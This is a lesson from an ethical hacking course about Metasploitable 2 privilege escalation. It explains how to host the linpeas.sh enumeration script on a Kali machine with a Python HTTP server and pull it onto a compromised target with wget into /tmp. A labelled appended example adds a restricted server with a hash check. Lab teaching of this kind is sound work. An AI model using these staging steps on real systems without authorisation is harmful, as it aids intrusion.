Ethical Hacking Crash Course


Metasploitable 2 – Privilege Escalation

File transfer – Python Server

In this section, you will learn how to perform basic file transfers between an attacker and a target machine using a simple Python server. This technique is essential for penetration testing, as it allows you to transfer tools, scripts, or payloads from your attacker machine to the target system efficiently. By setting up a temporary HTTP server with Python on your attacker machine and using wget on the target machine, you can easily download files across the network. This method is particularly useful for scenarios where traditional file transfer methods are unavailable or impractical.

To find potential privesc paths, we will need to upload the linpeas.sh script from here:
https://github.com/carlospolop/PEASS-ng

Make sure to download the linpeas.sh file from the project's releases into a folder on your Kali machine, which you will use as the server for the transfer. For this lesson, we use the "server" directory in your Kali home directory.

NOTE: If you do not have this directory, simply navigate to your home directory and create the folder/directory:

cd ~
mkdir server

Now download the linpeas.sh script:

cd server
wget https://github.com/carlospolop/PEASS-ng/releases/download/20231112-0a42c550/linpeas.sh

To initiate the transfer, we must make our server available on the network using Python's http.server module. Run the following command, and be sure to note the IP of your attack machine on the network:

python3 -m http.server 80

Your Python server will be running on port 80 and can be accessed over HTTP, for example through a browser.

In the Metasploit session where you currently have a shell on the target, first cd into the /tmp folder, which most of the time does not restrict a low-privilege account from downloading files to it, and then run the wget command, using the IP of your attack machine:

cd /tmp
wget http://192.168.100.11:80/linpeas.sh
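
`python3 -m http.server 80` listens on every interface and serves the whole working directory, with listings, to any host that can reach it. The following added example (not part of the original lesson) is a restricted variant that binds to one address, answers only one client IP and serves only linpeas.sh, and prints the file's SHA-256 for comparison after the transfer; the script name serve_one.py and the helper names are assumptions.

```python
import hashlib
import http.server
import os
import sys
from functools import partial


class AllowlistHandler(http.server.SimpleHTTPRequestHandler):
    """Serve only allowlisted file names, and only to one client IP."""
    allowed_files = frozenset()
    allowed_client = None

    def send_head(self):
        # send_head() backs both GET and HEAD, so one check covers both.
        name = self.path.split("?", 1)[0].lstrip("/")
        if self.client_address[0] != self.allowed_client:
            self.send_error(403, "client not allowed")
            return None
        if name not in self.allowed_files:  # exact match: no listings, no traversal
            self.send_error(404, "not found")
            return None
        return super().send_head()


def make_server(directory, bind_ip, port, client_ip, files):
    """Build a server bound to one interface instead of all of them."""
    handler = type("Handler", (AllowlistHandler,), {
        "allowed_files": frozenset(files), "allowed_client": client_ip})
    return http.server.ThreadingHTTPServer(
        (bind_ip, port), partial(handler, directory=directory))


def sha256_of(path):
    """Hash a file so the copy on the other side can be compared."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


if __name__ == "__main__":
    # Usage (assumed script name): python3 serve_one.py <kali-ip> <target-ip>
    bind_ip, target_ip = sys.argv[1], sys.argv[2]
    serve_dir = os.path.expanduser("~/server")
    print("sha256:", sha256_of(os.path.join(serve_dir, "linpeas.sh")))
    server = make_server(serve_dir, bind_ip, 80, target_ip, ["linpeas.sh"])
    server.serve_forever()
```

Because the transfer runs over plain HTTP, running `sha256sum linpeas.sh` in /tmp on the target (if the tool is present) and comparing it with the printed value confirms the file arrived unmodified.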